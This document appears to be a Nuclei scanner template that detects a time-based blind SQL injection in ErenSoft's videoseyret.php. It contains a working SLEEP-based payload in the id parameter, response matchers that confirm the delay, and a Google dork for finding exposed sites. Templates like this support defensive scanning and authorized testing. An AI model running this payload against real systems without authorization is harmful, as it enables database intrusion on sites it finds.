36 lines
1.1 KiB
YAML
36 lines
1.1 KiB
YAML
id: erensoft-sqli
|
|
|
|
info:
|
|
name: ErenSoft - SQL Injection
|
|
author: r3Y3r53
|
|
severity: high
|
|
description: |
|
|
SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
|
|
reference:
|
|
- https://cxsecurity.com/issue/WLB-2023070055
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
google-query: intext:"Kodlama:Erensoft"
|
|
tags: sqli,unauth,erensoft
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 20s
|
|
GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- duration >= 6
|
|
- status_code == 200
|
|
- contains(content_type, "text/html") && contains(body, "videoseyret")
|
|
condition: and
|
|
|
|
- type: word
|
|
words:
|
|
- class="entry-title"
|
|
# digest: 4b0a00483046022100fd8f2987ba3c3b57ba87203b113df644770464430999869c8847a469611abf9702210097830aa604d30884f54b8858843b5dc28239e46cf051564a650069017178c103:922c64590222798bb761d5b6d8e72950 |